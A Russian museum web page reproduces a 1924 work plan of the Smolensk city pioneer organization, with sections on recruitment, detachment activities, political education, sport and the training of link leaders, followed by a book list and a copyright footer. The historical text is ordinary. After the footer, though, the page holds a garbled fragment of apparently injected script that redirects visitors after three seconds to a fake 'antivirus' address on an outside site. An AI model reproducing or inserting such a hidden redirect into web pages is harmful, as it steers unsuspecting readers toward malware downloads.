Дети и молодежь Смоленщины. 1920-1930-е годы.
 
 

Выдержки из книги "Дети и молодежь Смоленщины: 1920-1930-е годы"

Из плана работы Смоленской городской пионерской организации

1924 год*

I. Рост [организации]
1. В предстоящий зимний период стоит задача сокращения массового роста в городе Лозунг «на каждого комсомольца - пионер» по рабочим районам губернии почти выполнен. Сейчас стоит задача углубленной работы с уже имеющимися кадрами пионеров.
2. Наряду с этим необходимо урегулировать и создать плановость в частичном росте пионерорганизации в городе, ставя себе целью вовлечение детей рабочих. Необходимо иметь план обхвата** и заранее намечать и обслуживать нужные пункты (фабрики, предприятия).
3. Частичный рост пионерорганизации в городе должен проходить не через школы и форпосты, а через работу отрядов, тем самым достигается обхват наиболее нужной части детей. Общественная работа пионеров в школе должна привлекать массу детей к работе пионер-клуба и вовлекать их в работу отряда.
4. При дальнейшем росте в городе необходимо обратить внимание на большее повышение возрастного уровня организации, сокращая до минимума рост октябрят.
II. Отряд
1. Работа городского отряда в зимнее время ни в коем случае не должна перегружаться большим количеством заданий. Каждый пионер должен быть занят в отряде не более двух раз в неделю, считая воскресенье. Иная постановка дела повлечет за собой слабую успеваемость пионеров в школе, что совершенно недопустимо.
2. Необходимо иметь в планах работы четкое разграничение задач отрядной работы и работы форпостов. Общая линия заключается в том, что основные знания и навыки пионер получает в отряде и на основе их ведет общественную работу в школе, вовлекая в нее всех школьников.
3. Основной характер политпросветработы в отрядах на зимний период должен носить гораздо более углубленный и серьезный характер, нежели летом. Основные моменты должны заключаться в следующем:
а)         беседы: по определенным программам, связанным с этапами. Эта форма является якобы приевшейся, но это происходит не потому, что они не нужны, а потому, что они преподносятся без всякого плана, без взаимной связи, без конкретных и знакомых пионерам примеров, без живой иллюстрации. Беседы должны иметь за собой индивидуальное чтение, как индивидуальную проработку вопросов;
б)        уголки являются как бы иллюстративным завершением определенной программы бесед и приурочиваются к праздничному пункту этапа;
в) стенные газеты, характер которых надо повернуть в сторону интересности и привлекательности. До сих пор стенные газеты освещали известные всем окружающим пионерам прошедшие [события] и давали поверхностные статьи по политвопросам.
Надо применить помещение политвопросников, развить отдел ребусов, шарад и загадок на политтемы, ввести отдел пионерской трибуны, где пионеры должны излагать новые предложения о работе и обсуждать их.
4. Основные моменты общественной работы городского пионер­отряда зимой заключаются в следующем:
а)         работа в школе, организационно-общественный форпост. Это является наиважнейшим пунктом общественной деятельности;
б)        связь с деревней, путем обмена писем, помощи газетами, литературой, предметами пионеробихода и работы, частичными выезда­ми и кампаниями;
в)         вступление в общество МОПР (через последний надо проводитьсвязь и помощь с детьми запада) и т. п. Проводя в этой работе такую же линию, как и в комсомоле: не вступать всем во все общества, а иметь в каждом из них несколько своих представителей. Важно, чтобы член­ство в обществах было не на бумаге, а чтобы пионеры участвовали в пропагандистской стороне дела или конкретной работе;
г)         трудовая работа, заключающаяся в субботниках по самообслу­живанию;
д)        борьба с беспризорностью путем взятия под материальное шеф­ство отряда отдельных беспризорников, знакомство с их бытом и причинами беспризорности вообще;
е)         демонстрация своих достижений перед рабочими того предпри­ятия, при котором существует отряд, но не путем участия в каждом торжественном собрании или вечере с рядом одинаковых номеров, а путем устройства цельных вечеров по этапам с широкой и новой программой.
5. В работе отряда физкультуру надо ставить под более широким понятием, нежели только спорт. Надо обратить внимание на вопросы гигиены и чистоты в клубе, школе и семье. Гимнастика должна но­сить комнатный характер, но не надо останавливаться лишь на воль­ных достижениях, а идти с более взрослыми пионерами дальше — к машинной гимнастике, к занятиям на снарядах, согласовывая это с медицинской постановкой дела. Массовый спорт надо провести пу­тем катания на лыжах, коньках и санках, практикуя состязания. Осенью необходимо обратить внимание на подготовку товарищей и спортинвентаря.
6. В работе отряда необходимо разграничивать общеотрядную ра­боту и работу звеньев. На звеньях лежит задача углубленной проработки тех вопросов, которые разбирались на общеотрядном сборе, разучивание тех упражнений, которые показывались на общеотрядном сборе. Звеньевые уголки необходимо сократить, собирая весь материал этапа в общественные уголки. Стенгазету для её улучшения и сокращения нагрузки пионеров лучше выпускать не отрядам в целом, а по звеньям Отрядные и звеньевые сборы надо проводить не по шаблону, а как можно разнообразнее.
7. Вопросы о работе октябрят весьма сложные. Ясно, что центр тяжести нужно перевести на еще большее оживление работы, путем игр, беллетристики, рассказывания, раскрашивания и т. д., необходимо обратить внимание на большую подготовленность руководителей звеньями октябрят.
8. Особенное внимание надо обратить на выявление и подготовку основного пионерского актива — вожатых звеньев. Наша цель заключается в том, чтобы на сборе звена руководящую роль в нем играл вожатый звена. На совете отряда, который состоит из вожатых звеньев, надо давать им задания, прорабатывать политвопросы этапа, составлять этапный план отряда. Отдельных вожатых звеньев, с целью их квалификации, создавать нельзя, эту функцию должен выполнять совет отряда. Для некоторой работы в звене (углубленный доклад или воспоминания) надо привлекать взрослых.
9. Как еще одну форму работы с активом, можно рекомендовать проведение общегородских и общерайонных сборов вожатых звеньев (вроде делегатского совещания), на котором делать итоговые доклады, ставить отчеты отдельных отрядов и звеньев, разрабатывать общегородской план кампании.

ГАНИСО, ф. р-140, оп. 2, д. 16, л. 32-33. Копия.
* Датируется по смежным документам.
** Так в тексте.

 

 

 

Литература
Так это было

"Так это было.
Смоленский
комсомол 1960-80
годов в воспоминаниях
современников"
Дети и молодёжь Смоленщины 1920-1930-е годы
Дети и молодёжь
Смоленщины
1920-1930-е годы

Спонсоры музея истории молодежного движения

 

Выражаем огромную благодарность людям, которые приняли и принимают участие в жизни музея и комплектации его фондов.


       
      
    (c) Авторские права на сайт принадлежат ООО "Союз ДМ", Смоленской областной общественной организации Общероссийской общественной организации "Российский Союз Молодежи", 2008-2012г.  
setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>